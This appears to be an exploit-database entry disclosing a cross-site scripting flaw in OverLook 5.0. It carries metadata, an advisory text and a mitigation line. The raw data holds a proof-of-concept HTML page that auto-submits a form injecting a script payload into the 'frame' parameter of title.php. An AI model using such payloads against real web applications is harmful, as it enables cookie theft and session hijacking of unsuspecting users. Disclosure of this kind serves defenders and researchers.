header-logo
Suggest Exploit
vendor:
OverLook
by:
Eliteman
7.5
CVSS
HIGH
Cross-site Scripting
79
CWE
Product Name: OverLook
Affected Version From: 5
Affected Version To: 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Cross-site Scripting Vulnerability in OverLook

OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user-supplied input before displaying it on web pages.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43872/info

OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OverLook 5.0 is vulnerable; prior versions may also be affected. 

<!-- -*-*- ANATOLIA SECURITY (c) 2010 -*-*- $ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln. $ ADV-ID: 2010-002 $ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt $ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss * PoC created by Eliteman ~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com ~ web: elite.anatoliasecurity.com --> <html> <head> <title> OverLook v5.0 Cross-site Scripting </title> </head> <body> <form action="http://target/overlook/title.php" method="get"> <input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html>

Navigation

Suggest Exploit

Services By CQR